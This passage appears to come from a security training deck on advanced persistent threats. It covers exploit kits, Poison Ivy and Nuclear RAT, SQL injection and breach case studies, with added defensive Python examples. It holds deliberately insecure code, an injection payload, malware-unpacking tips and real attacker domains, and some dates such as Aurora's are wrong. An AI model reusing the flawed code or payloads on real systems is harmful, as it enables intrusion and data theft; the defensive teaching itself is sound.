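    ("allow", "10.0.0.0/8", "10.1.0.53/32", "udp", 53),
    ("allow", "10.0.0.0/8", "10.1.1.53/32", "udp", 53),
    ("allow", "10.0.0.0/8", "0.0.0.0/0", "udp", 53),   # the leak: any resolver on the Internet
    ("deny", "10.0.0.0/8", "0.0.0.0/0", "udp", 53),
]


def resolvers_from_resolv_conf(text: str) -> List[str]:
    """nameserver entries from a resolv.conf-style file."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            out.append(parts[1])
    return out


def rogue_resolvers(configured: List[str]) -> List[str]:
    """Configured resolvers that are not on the approved list (the host-side hijack tell)."""
    return [r for r in configured if r not in APPROVED_RESOLVERS]


def dns_egress_leaks(rules: List[Rule]) -> List[Rule]:
    """Allow rules that let client subnets send DNS to anything but the approved resolvers.

    Every matching allow rule is reported regardless of position; a later deny
    does not make an earlier, broader allow safe.
    """
    leaks = []
    for rule in rules:
        action, src, dst, _proto, dport = rule
        if action != "allow" or dport != 53:
            continue
        src_net = ipaddress.ip_network(src)
        dst_net = ipaddress.ip_network(dst)
        src_is_client = any(src_net.subnet_of(n) or n.subnet_of(src_net) for n in CLIENT_NETS)
        dst_is_approved = (dst_net.num_addresses == 1
                           and str(dst_net.network_address) in APPROVED_RESOLVERS)
        if src_is_client and not dst_is_approved:
            leaks.append(rule)
    return leaks


if __name__ == "__main__":
    print("rogue resolvers:", rogue_resolvers(resolvers_from_resolv_conf(RESOLV_CONF)))
    print("DNS egress leaks:", dns_egress_leaks(RULES))
```

The same resolver comparison applies to Windows hosts (the configured servers from `ipconfig /all`) and to the router and Mac cases the slide alludes to; only the input parser changes.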
APT In Depth
MALWARE DISTRIBUTION
Booby trapped Documents
2010 Greg Hoglund
Drive-by-Malware (Web based Attack)
2010 Greg Hoglund
Trap Postings
2010 Greg Hoglund
SQL Injection
2010 Greg Hoglund
Reflected Injection (XSS)
2010 Greg Hoglund
Three Step Infection
2010 Greg Hoglund
Payload Server
• A machine that has the actual malware dropper ready for download
• The exploit server will redirect the victim to download a binary from this location
2010 Greg Hoglund
APT in Depth
MALWARE TOOLKITS
Malware Toolkits
• Those that don’t want to sell malware sell the means to help build malware:
• ZoPack
• El-Fiesta
• IcePack
• Neosploit
• AdPack
• Zeus
• SpyEye
• Tornado
• Eleonore
• Dragon Pack
• Bleeding Life
Malware Toolkit Exampe - IcePack
• Old-ish, but a
classic example
• According to the
toolkit creator, the
exploitation rate of
this toolkit in 2009
was 50% for
R ssian visitors
Russian
isitors and
20% for all of the
visitors. He asks for
$400 for the toolkit.
Page 121 | YYYY MM DD | CONFIDENTIAL
Malware Toolkit Example - IcePack
• Builds malware to take advantage of:
– MDAC - CVE-2006-0003
– Windows Media Player plug-in for Firefox and Opera CVE-2006-0005
– WebViewFolderIcon ActiveX - CVE-2006-3730
– VML - CVE-2006-4868
– Winzip FileView ActiveX - CVE-2006-6884
– QuickTime RTSP - CVE-2007-0015
Malware Toolkits - Zeus
Nice user-friendly interface☺
Malware Toolkits – Zeus Trojan
• 55% of Zeus-infected systems had up-to-date AV
• User-friendly
• Attacker can search collected data for cookies, files,
contents of HTTP requests, FTP logons, etc.
• The files collected by Zeus were typically stored on
compromised servers
• Sold for as low as $250 (with support!)
• One variant had C&C running on Amazon’s EC2 cloud
Malware Toolkit Example - Spy Eye
• Very similar to Zeus,
but not as advanced
• Botnet toolkit
• $500 USD
• Invisible as a service,
in the registry and files
• Captures data from IE
and Firefox
Malware Toolkits
• Sites dedicated to
exchanging malware
• Tips/tricks on
developing malware.
• Many of these sites
maintained by the
Russians
Zeus source code for the latest
version 2.0.8.9 for $100k in 2010!
Eleonore (exploit pack)
• PDF pack
– PDF Brand new PDF Exploit (12/2009)
– PDF collab.getIcon (4/2009)
– PDF Util.Printf (11/2008)
– PDF collab.collectEmailInfo (2/2008)
• MS Internet Explorer Exploits
– MS09-002 (Internet Explorer 7 exploit, 1/2009)
– MDAC – ActiveX (Internet Explorer exploit, 3/2007)
• Java
– Javad0 (12/2008) – Java Calendar (Java Runtime Environment (JRE) for
Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16
and earlier; and SDK and JRE 1.4.2_18 and earlier)
• Firefox
– compareTo – exploit for a Firefox vulnerability from 2005
– jno – Exploit for Firefox version 1.5.x (2006)
Tornado (exploit pack)
Dragon Pack
Bleeding Life
APT in Depth
COMMAND & CONTROL
Command & Control
2010 Greg Hoglund
Command & Control
• Command-and-control systems
– Custom protocols (like Aurora)
– Plain old URL’s
– IRC (not as common anymore)
– Stealth / embedded in legit traffic
• Machine identification
– Store infections in a back-end SQL database
Command & Control
• IRC C&C
• IRC control channel for a DDoS botnet
• Most of the C&C has moved to the web
Command & Control
Command & Control
Staging Server
• A place to store all the stolen goods before it
gets “exfiltrated”
– Data is moved off the network in a variety of ways
2010 Greg Hoglund
Drop Site
• Sometimes the stolen data is moved to a
tertiary system, not the same as the C&C.
2010 Greg Hoglund
APT in Depth
REMOTE ACCESS TOOLS
(RAT)
RATs
• Also known as “Implants”
– The “persistent” backdoor program
– Hide in plain sight strategy
– General purpose hacking tool
– Stealth capabilities
– In-field update capabilities
RATs
• According to Wikipedia: A Remote Administration Tool (known
more commonly on the Internet as a RAT) is used to remotely
connect and manage a single or multiple computers with a
variety of tools, such as:
– Screen/camera capture or control
– File management (download/upload/execute/etc.)
– Shell control (usually piped from command prompt)
– Computer control (power off/on/log off)
– Registry management (query/add/delete/modify)
– Other product-specific function
• Watch out for terminology: server is the remote part, client is the
GUI C&C part
RATs
• Many Chinese hacker websites offer these tools for download, including links to
reduh, WebShell, ASPXSpy, etc, plus exploits and zero-day malware.
RATs
• Nuclear RAT
• Gh0st RAT
• Bifrost Remote Controller
• Poison Ivy
Poison Ivy
• Polymorphic encryption / decryption routine
• Polymorphic
• Add unique tricks to bypass sandbox and
memory scan
Poison Ivy
Poison Ivy
A 7kb file? Probably not much in there… but let’s try
anyway.
Poison Ivy RAT
• Free for download at
www.poisonivy-rat.com
• The license says you
can order special,
undetected version
• It also says that
updating to new version
is very easy because
the remote part does
not need to be updated
Poison Ivy RAT
• In the Poison Ivy naming convention (other RATs as
well), the client is the GUI console and the server is
the remote agent sitting in the infected computer
Poison Ivy - Server
• Generated from within the client with user supplied options (IP
to connect, password etc.)
• Very small: around 6 kb of code (position independent), all the
rest sent on-demand from the client
• Hides very well in the system: I’ve seen behavioral tools failing
to detect it because they couldn’t recognize the API calls
• Generate options include:
– Password when authenticating with the client
– IP address to connect to
– Is starting at boot or no
– Where to drop the EXE
– Whether to perform the code injection, etc, etc.
Poison Ivy - Server
Poison Ivy – The Client
• Its capabilities include:
– File manager
– File shredder
– Registry manipulator
– Process viewer and manipulator
– Services and driver viewer
– TCP/IP relay proxy
– Active connection and port lister
– Remote cmd.exe shell
– Password dumper
– Key logger
– Screen and audio capture
– Internet camera capture
– Has plugin architecture that allows writing more
Poison Ivy – Network
• Site says it uses Camellia Encryption
• Challenge-response authentication: the first 256
random bytes are a challenge, the client sends
the response and the server verifies if the
client knows the password
• The encryption is not well implemented;
reseeding the crypto with each transmission
Poison Ivy – Network
• The encryption routines can be spotted by
seeing a lot of arithmetic operations
• By tracing how these functions work, we can
locate the password – very important
Poison Ivy – Obfuscating the Code
• Distributed obfuscated by ExeStealth v2.7x, as identified by
DiE.exe (Detect-It-Easy), PEiD failed to detect it
• The code is written in Borland Delphi
• The packer performs antidebugging tricks such as spaghetti
jumps, jumping to the middle of an instruction, checking «
BeingDebugged » flags, calculating the CRC over its own code
• There is an easy trick to unpack this: after the first Access
Violation exception, place the breakpoint on the CODE section –
the next break will be OEP
• We need to hide the debugger; PhantOm for Olly is ok!
• The final step is to use Import Reconstructor with the appropriate
plugin to rebuild the exe
Demo of Poison Ivy
• The trick to PI is distribution of the “server”
side of the trojan
• bank0famerica.com/login/downloadreport.exe
• Let’s have a look…
Nuclear RAT
• Developed by the “Nuclear Winter Crew”
• The server component (217,600 bytes) is
dropped under Windows, System32, or
Program Files folders, under a custom named
folder; the default is NR.
• Once the server component is run, it tries to
connect to its client, that listens for incoming
connections on a configurable port, to allow
the attacker to execute arbitrary code from his
or her computer.
Nuclear RAT - Capabilities
• Take screenshots
• View webcam shots
• Capturing key strokes from the keyboard
• General information about computer (Username, Timezone, Version
installed, Language, Available drives, etc)
• Mouse control
• Remote BAT/VBS script execution
• Monitor resolution
• File Manager (Download files and folders, Delete, Upload, Execute,
Rename, Copy, Set Attributes, Create Folder, etc)
• Window Manager (Hide, show, close, minimize/maximize, disable/enable X,
rename caption, send keys, etc)
• Process Manager (kill, unload DLL, list DLLs)
• Registry Manager (Create key, edit values REG_DWORD, REG_BINARY,
REG_MULTI_SZ, REG_SZ, create values, rename values)
• Clipboard manager
• Plugins manager (to add extra functionality to the malware)
• Shutdown computer
• Message Box
• Chat with infected machine
• Web downloader
• IP Scanner
• Port redirect
• TCP tunnel
• HTTP Web server
• Shell console
Nuclear RAT
• Is detectable by A/V
• Not as polymorphic as Poison Ivy
• Also known as
– Backdoor.Delf.jl
– Backdoor.Delf.jw
– Backdoor.Win32.Nuclear.b
– Win-Trojan/NucRAT
– Win-Trojan:NucRAT
– Win32/Nuclear.AG
– Backdoor.Win32.Nuclear.ak
Demo of Nuclear Rat
• The trick to NR, as with PI, is distribution of
the “server” side of the trojan
• bank0famerica.com/login/downloadreport.exe
• Let’s have a look…
APT in Depth
WEB APPLICATIONS: SQL
INJECTION
Un-validated User Input
• Most commonly found vulnerability & most
used in APT attacks involving web apps. User
input entered via the browser is automatically
trusted by the server to be correct & logical
• Little to no validation performed by server
code to determine whether or not the input
supplied was valid
• Ensure that the application accepts only known,
good input & verifies the supplied input at
every instance it is received
Parameter Tampering
• Parameter Tampering
– Attack directed towards business logic within the
application
– Attack that takes advantage of programmers’ use of
hidden or fixed form fields as a security measure
Parameter Tampering
• Let’s use the example of an online store
– Price information is stored in a hidden HTML field with
an assigned dollar value
– Assumption: hidden field won’t be edited
– Attacker edits $ value of product in HTML
– Attacker submits altered web page with new “price”
– This is still widespread in many web stores
Parameter Tampering
What if we changed the price from $274.85 to $2.74?
Parameter Tampering
• With a proxy such as Paros Proxy we can
modify the request
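The online-store scenario from the last few slides, as an added example that is not code from the talk: a checkout that trusts the hidden price field beside one that validates every field against an allowlist and re-derives the price from the server-side catalog. The catalog, product ids, prices and quantity limit are constructed.

```python
"""Hidden-field price tampering: the trusting checkout beside a hardened one."""
import re
from decimal import Decimal, InvalidOperation

# The server-side catalog is the only trustworthy source of a price (constructed).
CATALOG = {
    "SKU-1001": Decimal("274.85"),
    "SKU-1002": Decimal("19.99"),
}
SKU_PATTERN = re.compile(r"^SKU-\d{4}$")   # allowlist for the product-id field
MAX_QTY = 100


def vulnerable_checkout(form):
    """Uses the 'price' hidden field exactly as the browser submitted it."""
    qty = int(form["qty"])
    price = Decimal(form["price"])           # attacker-controlled value
    return price * qty


def hardened_checkout(form):
    """Validates every field against an allowlist and re-derives the price.

    Raises ValueError instead of silently correcting, so a tampered request
    is rejected and can be logged as a tampering signal.
    """
    sku = form.get("sku", "")
    if not SKU_PATTERN.match(sku) or sku not in CATALOG:
        raise ValueError("unknown product id")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity must be an integer") from None
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    # A client-supplied price is never trusted; if one arrives and disagrees
    # with the catalog, someone edited the form.
    submitted = form.get("price")
    if submitted is not None:
        try:
            tampered = Decimal(submitted) != CATALOG[sku]
        except InvalidOperation:
            tampered = True
        if tampered:
            raise ValueError("price field does not match catalog")
    return CATALOG[sku] * qty


def is_rejected(form):
    """True when hardened_checkout refuses the request."""
    try:
        hardened_checkout(form)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The slide's edit: $274.85 changed to $2.74 in the hidden field.
    tampered = {"sku": "SKU-1001", "qty": "1", "price": "2.74"}
    print("vulnerable total:", vulnerable_checkout(tampered))   # 2.74
    print("hardened rejects it:", is_rejected(tampered))        # True
    print("honest total:", hardened_checkout({"sku": "SKU-1001", "qty": "1"}))
```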
SQL Injection
• SQL injection is a particularly widespread and
dangerous form of injection
– To exploit a SQL injection flaw, the attacker must find a
parameter that the web application passes through to a
database
– By carefully embedding malicious SQL commands into
the content of the parameter, the attacker can trick the
web application into forwarding a malicious query to
the database
SQL Injection
• SQL Injection happens when a developer
accepts user input that is directly placed into
a SQL Statement and doesn't properly filter
out dangerous characters.
• This can allow an attacker to not only steal
data from your database, but also modify and
delete it.
SQL Injection
• Certain SQL Servers such as Microsoft SQL
Server contain Stored and Extended
Procedures (database server functions).
• If an attacker can obtain access to these
Procedures it may be possible to compromise
the entire machine.
SQL Injection
• Attackers commonly insert single quotes into
a URL's query string, or into a form's input
field to test for SQL Injection.
• If an attacker receives an error message like
the one below there is a good chance that the
application is vulnerable to SQL Injection.
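The mechanism the SQL Injection slides describe, as an added example that is not code from the talk: a lookup that concatenates the parameter into the statement beside one that binds it, so the single-quote probe produces the database error on the first and nothing on the second. The table, rows and inputs are constructed; sqlite3 stands in for any database engine.

```python
"""SQL injection in a user lookup: string-built query beside a parameterized one."""
import sqlite3


def make_db():
    """In-memory user table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "admin"), (2, "bob", "user")])
    return conn


def find_user_vulnerable(conn, username):
    """Concatenates the parameter straight into the statement.

    Returns the matching usernames, or the database's own error text when
    the built statement no longer parses, which is what a single-quote
    probe produces and what the slide says an attacker watches for.
    """
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    try:
        return [row[0] for row in conn.execute(query)]
    except sqlite3.OperationalError as exc:
        return "ERROR: " + str(exc)


def find_user_parameterized(conn, username):
    """Binds the value as a parameter; the input is data, never SQL."""
    query = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(query, (username,))]


def looks_like_probe(value):
    """Server-side validation hook for a field that should only ever hold a
    plain username: a single quote is the probe character from the slide."""
    return "'" in value


if __name__ == "__main__":
    conn = make_db()
    print(find_user_vulnerable(conn, "bob"))           # ['bob']
    print(find_user_vulnerable(conn, "'"))             # ERROR: unrecognized token ...
    print(find_user_vulnerable(conn, "x' OR '1'='1"))  # ['alice', 'bob']: whole table
    print(find_user_parameterized(conn, "x' OR '1'='1"))  # []: treated as a literal name
    print(looks_like_probe("bob"), looks_like_probe("'"))  # False True
```

The error string returned for the lone quote is the kind of message the next slide shows; an application that hands it back to the browser is confirming the flaw to whoever sent the probe.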
SQL Injection Example
SQL Injection Example
APT IN DEPTH
DECONSTRUCTING THE
ATTACK
Some Examples
• Aurora
• Stuxnet
• HB Gary
• Sony PlayStation Network
• Night Dragon
• RSA
• Oakridge
Operation Aurora
Operation Aurora (January 2011)
• Attack started in December, 2010 until beginning of
January, 2011
• Sourced from servers in Taiwan, Texas and Illinois
• Intellectual property was what they were trying to steal
• Demonstrated several of the key components of an APT
• Speculations are a Chinese state-sponsored attack
• IP addresses that were used had been used in the past
against US companies and were confirmed to be Chinese
State-sponsored (i.e. PLO); fits the profile
• Google and at least 30 other companies (incl. Yahoo,
Symantec, Juniper, Northrop Grumman and Dow
Chemicals) were hit
Operation Aurora (January 2011)
• Gipson, Hoffman & Pancione (LA law firm)
• Also hit with spear phishing e-mails from
people staff recognized with a link/attachment
• Attack reported to the FBI
• They represented a US company over a legal
dispute regarding a copyright infringement
over China’s Green Dam software
• Attack fit the profile of the Google attack
Operation Aurora (January 2011)
• Attackers targeted software-configuration
management (SCM) systems that held proprietary
information of Google, Adobe and other Fortune 100
companies over several months.
• Zero-day IE vulnerability
• Was based on a vulnerability in IE known to
Microsoft, but not seen actively in the “wild”.
• Affects: Internet Explorer 6 Service Pack 1 on
Microsoft Windows 2000 Service Pack 4, and Internet
Explorer 6, Internet Explorer 7 and Internet Explorer
8 on supported editions of Windows XP, Windows
Server 2003, Windows Vista, Windows Server 2008,
Windows 7, and Windows Server 2008 R2.
Operation Aurora (January 2011)
• To gain initial access to the victim’s networks, the
attackers started with targeted spear phishing
attacks against the victim company
• The email appeared to be from someone trusted.
• Contained a link to a Taiwanese website that
hosted malicious JavaScript.
• The malware, in turn, exploited an IE vulnerability
• The exploit triggers when Internet Explorer
attempts to access memory that has been
partially freed.
Operation Aurora
• Once exploited, the victim machines connected to a number of
C&C systems over TCP/443 – think covert channel
– Difficult to inspect (encrypted)
– Not out of the ordinary
Operation Aurora
• The attacker then used the owned machines
to attack other systems on the same network
(pivoting).
• In “Operation Aurora”, software configuration
mgmt (SCM) systems were targeted due to
their commonly insecure nature.
• We will see this attack during the
demonstration section
Stuxnet
Stuxnet
• Very complex SCADA attack
• Stuxnet demonstrated that even isolated
physical networks could be hacked.
• Discovered by VirusBlokAda company in
Minsk, Belarus in July, 2010
• Affecting >15 plants in Iran, Indonesia, India,
UK, North America, Korea
Stuxnet
• Targets Siemens WinCC and SIMATIC
Process Control System (PCS7)
• Programmable logic controller (PLC) rootkit
• Symantec noted that 60% of worldwide
targeted machines were in Iran
• Put their nuclear enrichment program back as
much as 5 yrs!
• Many different ideas of who was responsible
– Some say the US or its allies (i.e. Israel)
Stuxnet
• Attacked Windows systems
• Stuxnet had 5 zero-day vulnerabilities – one or
two is common, 5 is not
• And used Conficker (MS08-067) to spread
• Used many vulnerabilities previously patched in
Windows (i.e. MS10-046 LNK Vulnerability)
• Used the Shortcut icon vulnerability (MS10-046)
– affecting every version of Windows since
Windows 2000 (even Win 95) (patched Aug 2,
2010)
– Allows for execution without even opening a file
Stuxnet
• Written in different languages (i.e. C, C++)
• Used 7 methods of spreading itself
• Spread mostly through USB thumb drives
• Network shares, print spoolers & Siemens
project files
• UPX packed, XOR encoded everywhere
• Connected to C&C and sent off some
sensitive data, but mostly controlled the PLCs
in-field
Stuxnet
• MS10-046 (LNK Vulnerability) Almost two years old
• MS08-067 (Server Service) Patched for two years
• MS10-061 (Print Spooler) Disclosed over one year ago –
Used to push a file to remote machine and have it execute
• MOF ‘Feature’ Not a vulnerability?
• WinCC DBMS Password Original work
• Step7 Project Files Original work
• MS10-073 (Kbd Privilege Escalation) Original work
• Rootkit drivers signed with valid certificates (Realtek and
Jmicron)
Stuxnet – Natanz Nuclear Facility
• Iranian IR-1 centrifuge to increase from its normal
operating speed of 1,064 hertz to 1,410 hertz for 15
minutes before returning to its normal frequency
• Twenty-seven days later, the virus went back into
action, slowing the infected centrifuges down to a
few hundred hertz for a full 50 minutes.
• The stresses from the excessive, then slower
speeds, caused the aluminum centrifugal tubes to
expand, often forcing parts of the centrifuges into
sufficient contact with each other to destroy the
machine.
Stuxnet
• Would record normal readings of the centrifuge
and replay these readings to technicians
• Stuxnet would affect the performance of the
equipment and provide false information to
technicians
• The other thing Stuxnet would do was if the
technicians noticed (maybe based on sound) if
the centrifuge was spinning out of control, they
would go for the kill switch – Stuxnet knew how
to disable that!
Future Effects of Stuxnet-like Threats
• Infrastructure-based malware, APT
– Water supplies
– Power grids
– Nuclear power plants
– Air traffic control
– Military
RSA
RSA
• We assumed the hack on RSA was just that, a
hack to get into RSA.
• But, this is another indication of APT
• The Lockheed hack may have been planned for
quite a while - Hacking RSA was part of this plan.
• Like the thief that breaks into an engineering
company to steal the plans to a bank's building
layout.
• Wouldn’t surprise me if we don’t see increased
attempts against other sub-contractors
RSA
• Provides SecurID to White House, CIA,
NSA, Pentagon, DHS, Lockheed, Grumman,
L3, etc.
• Targeted e-mail sent to EMC employees on
March 3, 2011
• Contained an attachment called
"2011 Recruitment plan.xls".
RSA
• Opening the XLS
attachment
• Embedded flash
object shows up as
a [X] symbol in the
spreadsheet
RSA
• The Flash object is executed by Excel
• Flash object then uses a Flash Player vulnerability
(CVE-2011-0609) to execute code and to drop a
Poison Ivy backdoor (or PI-RAT) to the system.
• Poison Ivy is a form of “Remote Access Toolkit” or
RAT.
• The exploit code then closes Excel and the infection
is over.
• After this, Poison Ivy connects back to its server at
good.mincesur.com.
RSA
• The domain mincesur.com has been used in
similar espionage attacks over an extended
period of time.
• Once the connection is made, the attacker has
full remote access to the infected workstation.
• Even worse, it has full access to network drives
that the user can access.
• Apparently the attackers were able to leverage
this vector further until they gained access to
the critical SecurID data they were looking for.
RSA
• To further obscure the removal of massive
amounts of data, the aggregated data was
placed in several compressed and password
protected RAR files.
• RAR is a compressed archive format for files.
• They used FTP to transfer the RAR files to an
outside staging server (a compromised
machine at a hosting provider).
• Finally, the attackers pulled the files from the
external compromised host.
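The staging step just described, seen from the network: an added example, not code from the talk, that runs two detections over a constructed FTP-proxy log, flagging archive uploads to hosts outside the organization and any client whose upload volume to one external host crosses a threshold. The log format, addresses, internal ranges and threshold are all assumptions.

```python
"""Spotting bulk RAR uploads over FTP to an outside staging host."""
import ipaddress
import re
from collections import defaultdict

# Address space the organization considers internal (constructed).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
ARCHIVE_EXT = (".rar", ".zip", ".7z")
BYTES_THRESHOLD = 500_000_000      # outbound bytes per (client, external host)

# Constructed FTP-proxy log: time, client, server, command, argument, bytes.
SAMPLE_LOG = """\
2011-03-17T01:12:08 10.20.5.31 10.20.9.4 RETR budget.xlsx 412000
2011-03-17T02:40:11 10.20.5.31 203.0.113.45 STOR part01.rar 262144000
2011-03-17T02:51:37 10.20.5.31 203.0.113.45 STOR part02.rar 262144000
2011-03-17T03:02:59 10.20.5.31 203.0.113.45 STOR part03.rar 198000000
2011-03-17T09:15:22 10.20.7.12 203.0.113.80 STOR photo.jpg 2400000
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (STOR|RETR) (\S+) (\d+)$")


def is_internal(addr):
    """True when the address falls inside one of the internal ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line):
    """One log line -> dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, dst, cmd, name, nbytes = m.groups()
    return {"ts": ts, "src": src, "dst": dst, "cmd": cmd,
            "name": name, "bytes": int(nbytes)}


def detect_staging(log_text):
    """Returns (rule, src, dst, detail) alerts for uploads to external hosts.

    Rule 1: an archive (the RAR files on the slide) stored on an external host.
    Rule 2: a (client, host) pair whose total upload volume crosses the
    threshold, which catches the same exfiltration even if the files are
    renamed to hide the extension.
    """
    alerts = []
    volume = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["cmd"] != "STOR" or is_internal(rec["dst"]):
            continue
        if rec["name"].lower().endswith(ARCHIVE_EXT):
            alerts.append(("archive_upload_external", rec["src"], rec["dst"], rec["name"]))
        volume[(rec["src"], rec["dst"])] += rec["bytes"]
    for (src, dst), total in volume.items():
        if total >= BYTES_THRESHOLD:
            alerts.append(("bulk_upload_external", src, dst, str(total)))
    return alerts


if __name__ == "__main__":
    for alert in detect_staging(SAMPLE_LOG):
        print(*alert)
```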
Oakridge Labs
“One of our core competencies at the
lab is cyber security research”
(Thomas Zacharia – Deputy Director,
Oak Ridge National Laboratory)
ORNL
• Deliver scientific discoveries and technical
breakthroughs for clean energy – home of the
1943 “Manhattan Project”
• Spear-phishing campaign starting on April 7, 2011
• Directed at Oak Ridge's business systems
• The attacks were launched through phishing
emails that were sent to some 573 of 5000 lab
employees.
• The emails were disguised to appear as if they came
from the lab's HR department – regarding benefits
related changes.
ORNL
• 57 out of some 530 employees clicked on a link in the
email 'campaign', according to Thomas Zacharia,
ORNL deputy lab director
• The emails contained a link that employees were
asked to click on for further information.
• The malware exploited a zero-day flaw in Internet
Explorer, and compromised two of the 57 systems
• Allows an attacker to install malware on a user’s
machine if he or she visits a malicious web site.
• Flaw was patched by Microsoft on April 12 (days after
the first e-mail was received – server breach
discovered on April 11).
ORNL
• One of those two computers then spread the
malware to other systems within the lab.
• Some employees appear to have clicked on the
link resulting in an information-stealing malware
program being downloaded on their systems
• Had to shut down E-mail and Internet connection
• Interestingly enough ORNL is a center of
excellence for cyber security for the DOE and
conducts research into malware and
vulnerabilities in software and hardware as well
as phishing attacks.
Sony Playstation Network
Sony PlayStation Network
• Hacked by the group
Anonymous in Apr 2011
• Called OpSony
• Reported that a file
named “Anonymous” was
planted on PlayStation
servers and it reportedly
contains the words “We
are Legion.”
• Exposed the names,
birthdays, email
addresses, passwords,
security questions, credit
card details, of all PSN
users.
Sony PlayStation Network
• Actual attack vector will probably remain unknown
• All the data was unencrypted!
• Theory by security experts is an exploit as simple as
basic SQL Injection/Parameter tampering.
• Anonymous has performed similar attacks on other
Sony real estate:
• http://www.sonymusic.co.jp/bv/cromagnons/track.php?item=7419
Sony PlayStation
• The hacking of 77 million Sony users' data and the
resulting 23-day closure is expected to cost the
company $171M
• Sony said the effects to the company of the
March earthquake that struck Japan will be
about $268.9 million.
• The company said its loss for the fiscal year
that ended on March 31 will be about $3.18
billion
HB Gary
“We were terrified. I saw all the fruits
of my labor, my livelihood, being
jeopardized.”
(Greg Hoglund – HB Gary)
HBGary Federal – SQL Injection
• Dismantled and humiliated by "Anonymous"
using a SQL Injection attack in a nearly
meaningless web application as its start point
• Used the hack against HBG’s CMS system
• Rather than using an off-the-shelf CMS, HBG
had a custom app built
• Advantage of off-the-shelf - thousands of users
and regular bug fixes, resulting in a much
lesser chance of extant security flaws.
HBGary Federal
• The exact URL used to break into hbgaryfederal.com
was http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27
• The URL has two parameters named pageNav and
page, set to the values 2 and 27, respectively.
• One or other or both of these was handled incorrectly
by the CMS, allowing the hackers to retrieve data
from the database that they shouldn't have been able
to get.
HBGary Federal – SQL Injection
• Specifically, the attackers grabbed the user database
from the CMS—the list of usernames, e-mail addresses,
and password hashes for the HBGary employees
authorized to make changes to the CMS.
• It stored only hashed passwords—passwords that have
been mathematically processed with a hash function to
yield a number from which the original password can't be
deciphered (i.e. 897&%$$%)
• Rainbow tables were used to brute force the hashes
• CEO Aaron Barr and COO Ted Vera—used passwords
that were very simple; each was just six lower case
letters and two numbers
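Why the CMS hashes on this slide fell to a precomputed table, and what would have resisted it, as an added example that is not code from the talk or from any CMS: an unsalted fast hash gives one fixed password-to-hash mapping that a single table covers, while a per-user salt plus a slow KDF does not. The sample passwords and the miniature table are constructed; the keyspace function just sizes the six-lowercase-plus-two-digit pattern the slide describes.

```python
"""Unsalted fast hash (table-crackable) beside salted PBKDF2 (not)."""
import hashlib
import os
import secrets


def keyspace_six_lower_two_digits():
    """Candidates matching the slide's pattern: six lowercase letters followed
    by two digits. 26**6 * 10**2 = 30,891,577,600, small enough to precompute
    once for a fast unsalted hash and reuse against every site storing them."""
    return 26 ** 6 * 10 ** 2


def unsalted_md5(password):
    """The weak scheme: one fixed password->hash mapping, so one table fits all."""
    return hashlib.md5(password.encode()).hexdigest()


def build_table(candidates):
    """Stand-in for a rainbow table: hash -> plaintext for each candidate."""
    return {unsalted_md5(p): p for p in candidates}


def lookup(table, hash_value):
    """Table lookup; returns the recovered plaintext or None."""
    return table.get(hash_value)


def salted_pbkdf2(password, salt=None, iterations=200_000):
    """Per-user random salt plus a deliberately slow KDF. A precomputed table
    is useless because every user would need a different one, and each guess
    costs `iterations` HMAC computations. Returns 'salt$iterations$digest'."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "%s$%d$%s" % (salt.hex(), iterations, digest.hex())


def verify_pbkdf2(password, stored):
    """Recomputes with the stored salt and compares in constant time."""
    salt_hex, iterations, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return secrets.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed weak passwords in the slide's pattern.
    table = build_table(["abcdef12", "qwerty99", "zzzzzz00"])
    print("keyspace:", keyspace_six_lower_two_digits())
    print("md5 recovered from table:", lookup(table, unsalted_md5("abcdef12")))  # abcdef12
    a, b = salted_pbkdf2("abcdef12"), salted_pbkdf2("abcdef12")
    print("same password, different stored records:", a != b)                    # True
    print("verify right/wrong:", verify_pbkdf2("abcdef12", a), verify_pbkdf2("abcdef13", a))
```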
HB Gary – Password Reuse?
• This should have only affected HB Gary
Federal
• Unfortunately for HBGary Federal, it was not.
• Neither Aaron nor Ted followed best
practices.
• Instead, they used the same password in a
whole bunch of different places, including
email, Twitter accounts, and LinkedIn.
• For both men, the passwords allowed
retrieval of e-mail
HB Gary…SSH without certs…bad.
• Along with its web server, HBGary had a Linux
machine, support.hbgary.com, on which many
HBGary employees had shell accounts with ssh
access, each with a password used to authenticate
the user.
• One of these employees was Ted Vera, and his ssh
password was identical to the cracked password he
used in the CMS.
• This gave the hackers immediate access to the
support machine.
• HB Gary could have used certificate based
authentication, but instead opted for passwords only.
HB Gary
• Ted was only a regular non-superuser – meaning he
could only see data owned by his account.
• Unfortunately, the server was vulnerable to privilege
escalation – essentially allowing a normal user to
become “root”.
• The error was published in October 2010 with a full,
working exploit.
• By November, most distributions had patches
available, and there was no good reason to be
running the exploitable code in February 2011.
HB Gary
• Exploitation of this flaw gave the Anonymous
attackers full access to HB Gary's system
• It was then that they discovered many
gigabytes of backups and research data,
which they duly purged from the system
HB Gary
• Aaron's password yielded even more fruit. HBGary
used Google Apps for its e-mail services
• For both Aaron and Ted, the password cracking
provided access to their mail.
• But Aaron was no mere user of Google Apps: his
account was also the administrator of the company's
mail.
• With this higher access, he could reset the passwords
of any mailbox and hence gain access to all the
company's mail—not just his own. It's this capability
that yielded access to Greg Hoglund's mail.
